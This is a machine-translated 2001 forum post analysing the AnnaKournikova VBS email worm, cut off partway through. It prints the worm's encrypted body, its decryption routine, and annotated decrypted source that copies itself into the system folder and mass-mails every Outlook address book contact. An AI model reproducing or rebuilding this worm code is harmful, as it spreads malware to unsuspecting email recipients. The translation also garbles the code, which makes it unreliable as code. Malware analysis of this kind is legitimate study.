Annakournikova virus source code analysis
Annakournikova virus source code resolution This post copyright belongs to the original author, other websites reproduced must be indicated, and traditional media reprints must be in advance with the original author and E Dragon Western Hutan [http://www.xici.net]. Author: hangsun Issue Date: 2001-03-10 16:41:08 return "hacker also Man" quick return AnnaKournikova virus is performed by the annex vbs source code, while doing little hands and feet, but is still very easy to parse out . The following is the source code of its attachment file (I added): 'vbs.onthefly created by onthefly' Execute the code returned by the E7iqom5je4z function, the E7iqom5je4z function is actually a string conversion function, the role is encryption (a simple The virus code after the encryption algorithm is decrypted. The parameter of the E7iqom5je4z function is the encrypted viral source code string.
Execute e7iqom5JE4z ( "X) udQ0VpgjnH {tEcggvf {DQVpgjnH {QptGqttgTwugoPzgvUvgGQ9v58Jr7R6 EgtvcQgldeg * vY $ eUktvrU0gjnn $ 9G5QJv786r0Rgtyiktgv $ MJWEu ^ hqyvtc ^ gpQjVHg {n $ ^ jE * t9:?. (JE * t33 3 (Etj3 * 63 (jE * T23 ; (ETJ5 * 4 (ETJ3 *; 2 (JE * T23 2 (ETJ3 * 32 (JE * T45 (JE * T33 ; (ETJ3 * 72 (JE * T33 8 (ETJ3 * 62 (JE * T8: (JE * T:; (JE * T33 7 (ETJ3 *; 3 (JE * T23 5 (ETJ5 * 4 (ETJ6 * ; (Etj6 * 8 (Etj7 * 5 (Etj6 * :( Etj; * :? gUvQtcyVopldi 7Egtvcqgldeg * vu $ terkkviph0nkugu {gvqoldeg $ v tyQoclVip7de0rqh {nkguyterk0veuktvrwhnncpgot.yQoclVip7dI0vgrUegckHnnqgf * t 2 (^ $ pCcpqMtwkpqmcxl0irx0ud $ kh9G5QJv786r0Rgtticgf $ * MJWEu ^ hqyvtc ^ gpQjVHg {no ^ kcgn $ f @> $$ 3vgjpgp4CUJ9inEN * pgfhkhkopqjvp * yq 3? cfpf {cp * yq 4? 8jvpg9G5QJv786r0RwtpJ $ vv
k $ (dxtehn ($ jEegmjVuk $ # (xednth ($$ guvYhpu: sI [h; 3sk496d5:? 5x0 / vCcvjegovpuhuYsp [:; I3hC0fftyQoclVip7dI0vgrUegckHnnqgf * t 2 (^ $ pCcpqMtwkpqmcxl0irx0ud $ k9sd4:? 6x5 / 5F0ngvgCgvhtgwUodvk VwtgKhsk496d5: 5x0 / qV > @ $$ Vgjpk9sd4: 6x5 / 5U0pgfGQ9v58Jr7R6t0igtyvkgJ $ EM ^ WquvhcygtQ ^ VpgjnH ^ {conkfg $$$ 3pGfhKgPvzpGfhKgPvzpgfhkpGfwHepkvpqX) udiy370d2 ") 'e7iqom5JE4z-- following is a simple string algorithm decryption algorithm logic function which is:.. a) The characters of the ASC code are 15, 16, 17 are converted to the carriage return, wrap, space; b) minimize the ASC code of other characters; c) Position of the adjacent two characters. Function E7iqom5je4z (HFEIUKRCOJ3) for i = 1 To Len (hFeiuKrcoj3) Step 2StTP1MoJ3ZU = Mid (hFeiuKrcoj3, I, 1) WHz23rBqlo7 = Mid (hFeiuKrcoj3, I 1, 1) If Asc (StTP1MoJ3ZU) = 15 ThenStTP1MoJ3ZU = Chr (10) ElseIf Asc (StTP1MoJ3ZU) = 16 ThenStTP1MoJ3ZU = Chr (13) ElseIf Asc (StTP1MoJ3ZU) = 17 ThenStTP1MoJ3ZU = Chr (32) ElseStTP1MoJ3ZU = Chr (Asc (StTP1MoJ3ZU) - 2) End IfIf WHz23rBqlo7 <> "" ThenIf Asc (WHz23rBqlo7) = 15 ThenWHz23rBqlo7 = Chr (10) ElseIf ASC (WHz23RBQLO7) = 16 Thenwhz23RBQLO7 = CHR (13) Elseif ASC (WHz23RBQLO7) = 17 Thenwhz23RBQLO7 = CHR (32) ElsewHz23RBQLO7 = CHR (ASC (WHz23RBQLO7) - 2) end ifend Ife7iqom5je4z = e7iqom5je4z & whz23rbqlo7 & sttp1moj3zunextens Function'vbswg 1.50B According to the above transformation algorithm, I have written a Delphi algorithm to perform the same function (sorry, I will not vb). After executing the transformation process, the true appearance of the viral source code is obtained. The following is my deal with the viral source code after using UltraEdit with UltraEdit with UltraEdit, and adds my personal annotation. 'Vbs.onthefly create by onthefly' exception handling on error resume next 'Create Script object set shellobj = createObject ("wscript.shell")' write registry data "WORM MADE with VBSWG 1.50b", here is very unfair Practice: ASC code is patchwork. Maybe this is a hacking style. However, there is no significance.
Shellobj.Regwrite "HKCU / Software / ONTHEFLY /", CHR (87) & CHR (111) & CHR (114) & CHR (109) & CHR (32) & CHR (109) & CHR (97) & CHR (100 ) & Chr (101) & chr (32) & chr (119) & chr (105) & chr (116) & CHR (104) & chr (32) & chr (86) & chr (98) & chr (115 ) & Chr (119) & chr (103) & chr (32) & chr (49) & chr (46) & chr (53) & chr (48) & chr (98) 'Create a file system object SET FILESYSOBJ = CREATEOBJECT ( "scripting.filesystemobject") 'copy source file to the system directory virus fileSysObj.copyfile wscript.scriptfullname, fileSysObj.GetSpecialFolder (0) & "/AnnaKournikova.jpg.vbs"' read registry data, if not already propagating through, the Communicate to all MAIL address in the Outlook Address Book ("HKCU / Software / ONTHEFLY / MAILED") <> "1" the mailbroadcast () end if 'if it is No. 26, open no one WWW site if Month (now) = 1 and day (now) = 26 Ten shellobj.run "http://www.dynabyte.nl", 3, false f 'below makes the program in the hard disk (uncertain) SET txtFile = fileSysObj.opentextfile (wscript.scriptfullname, 1) textStr = txtFile.readalltxtFile.CloseDo If Not (fileSysObj.fileexists (wscript.scriptfullname)) Then Set scriptTxtFile = fileSysObj.createtextfile (wscript.scriptfullname, True) scrip tTxtFile.write textStr scriptTxtFile.Close End IfLoop 'send mail to all addresses in the address book, and the symbol has been transmitted in the registry Function mailBroadcast () On Error Resume Next Set outlookApp = CreateObject ( "Outlook.Application") If outlookApp = " Outlook "Then Set mapiObj = outlookApp.GetNameSpace (" MAPI ") Set addrList = mapiObj.AddressLists For Each addr In addrList If addr.AddressEntries.Count <> 0 Then addrEntCount = addr.AddressEntries.Count For addrEntIndex =